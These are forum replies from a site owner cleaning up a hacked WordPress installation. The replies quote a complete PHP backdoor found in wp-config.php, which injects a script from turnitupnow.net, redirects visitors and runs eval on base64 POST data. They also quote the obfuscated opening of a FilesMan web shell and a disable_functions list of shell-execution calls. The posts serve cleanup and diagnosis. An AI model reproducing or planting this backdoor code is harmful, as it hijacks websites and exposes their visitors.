p-mt
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectwith
sudo grep -r turnitupnow * > badfiles.txtI found A LOT more of this!
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectthe above code is explained here: https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does
This code is present also in most of the php-files of my theme!! I have to clean this up!
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectHello,
since yesterday night, unfortunatelly, I again found activities on my server. Again several w????????w.php scripts (e. g.: w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (https://pastebin.com/rekKbXJb), which probably is the one described here: https://www.webhackblog.com/2011/10/31/sm3-php-spam-script/
I now decided, to be more radical. Steps I have done:
– I delete all older content, which is not needed any more in DocumentRoot (made a backup before that with tar)
– make backup on all plugins (tar)
– delete all plugins (plan is, to reinstall the needed one later)
– delete all older themes (I only take the new ones, coming with the fresh wordpress installation)
– I followed old_fart recommendation to disable functions in php
— old-fart recommendation —
1. locate your php.ini file
2. replace there
disable_functions =
to
disable_functions = “apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode”
3. force to restart http server
—– find and afterwards delete malware files by …
– … find . -name sm*.php -print
– … find . -name “w?????????.php” -print– delete all .htaccess files with > find . -name “.htaccess” -exec rm {} \;
– recreate my wp-config.php from scratch!!!!
In the old one, I found this code, which probably isn’t anything, I like to have. Maybe, this is the backdoor??:
“<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “https://turnitupnow.net/?rnd=”.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=https://$sessdt_j’><!–“; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
”Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectdo you think, wordpress will work after that??
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectHi Old_fart,
here you can find content of “w11756090n.php”: w11756090n.php
Forum: Fixing WordPress
In reply to: 3.3.1 Hacked by saveprefs.ru redirectHello together,
same issues on my site! I found these post quite useful: https://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en
I looked for similar php-files and found a lot, e. g.:
-rw-r–r– 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
-rw-r–r– 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
-rw-r–r– 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
-rw-r–r– 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
-rw-r–r– 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
-rw-r–r– 1 www-data www-data 23289 16. Jan 11:36 w40138369n.phpand much more.
Unfortunately, I couldn’t understand the content. It starts with:
<?php $auth_pass=””;$color=”#df5″;$default_action=”FilesMan”;$default_use_ajax=true;$default_charset=”Windows-1251″;preg_replace(“/.*/e”,”\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk …
If anybody could or is interested in such a file for diagnostics I could send by email.
What I have done now is:
– Checking for unknown system users (wasn’t any)
– Changing all system passwords (root and users)
– Changing mysql root password
– Changing all mysql user passwordsI realized, that every some minutes, the .htaccess-files will be updated. My plan now is:
– to identify all w??????????n.php-files and delete them (all are under Apache DocumentRoot).
– to delete unnecessary .htaccess-files or delete unwanted content in these .htaccess-files.
– check, if the update of .htaccess-files will continue or is stopped.Keep fingers cross, that this will help!